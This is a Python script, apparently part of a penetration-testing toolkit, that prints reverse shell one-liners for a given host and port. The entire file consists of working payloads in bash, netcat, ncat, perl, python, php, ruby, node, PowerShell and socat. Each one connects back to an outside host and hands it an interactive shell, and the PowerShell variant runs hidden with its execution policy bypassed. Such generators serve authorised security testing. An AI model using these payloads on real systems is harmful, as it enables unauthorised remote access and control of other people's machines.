PentestPilot/bin/shells/revsh.py

#!/usr/bin/env python3
import sys

def usage():
    print(f"Usage: {sys.argv[0]} <lhost> <lport>")
    sys.exit(1)

if len(sys.argv) < 3:
    usage()

ip = sys.argv[1]
port = sys.argv[2]

tpls = {
    'bash_tcp': f"bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'",
    'bash_udp': f"bash -c 'bash -i >& /dev/udp/{ip}/{port} 0>&1'",
    'nc_mkfifo': f"rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/f",
    'ncat': f"ncat {ip} {port} -e /bin/sh",
    'ncat_pty': f"ncat --ssl {ip} {port} -e /bin/bash",
    'perl': f"perl -e 'use Socket;$i=\"{ip}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
    'python3': f"python3 -c 'import os,pty,socket as s;h=\"{ip}\";p={port};c=s.socket();c.connect((h,p));[os.dup2(c.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'",
    'php': f"php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    'ruby': f"ruby -rsocket -e'f=TCPSocket.open(\"{ip}\",{port}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'",
    'node': f"node -e 'var s=require(\"net\").Socket();s.connect({port},\"{ip}\",function(){{s.pipe(process.stdout);process.stdin.pipe(s);}});'",
    'powershell_tcp': f"powershell -NoP -W Hidden -Exec Bypass -Command \"$c=New-Object System.Net.Sockets.TCPClient(\'{ip}\',{port});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length)) -ne 0){{;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String);$sb2=$sb+\'PS \'+(pwd).Path+\'> \';$sbBytes=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbBytes,0,$sbBytes.Length);$s.Flush()}}\"",
    'socat_listener': f"socat -d -d TCP-LISTEN:{port},fork,reuseaddr FILE:`tty`,raw,echo=0",
    'socat_target': f"socat TCP:{ip}:{port} EXEC:/bin/bash,pty,stderr,setsid,sigint,sane",
}

for k, v in tpls.items():
    print(f"[{k}]\n{v}\n")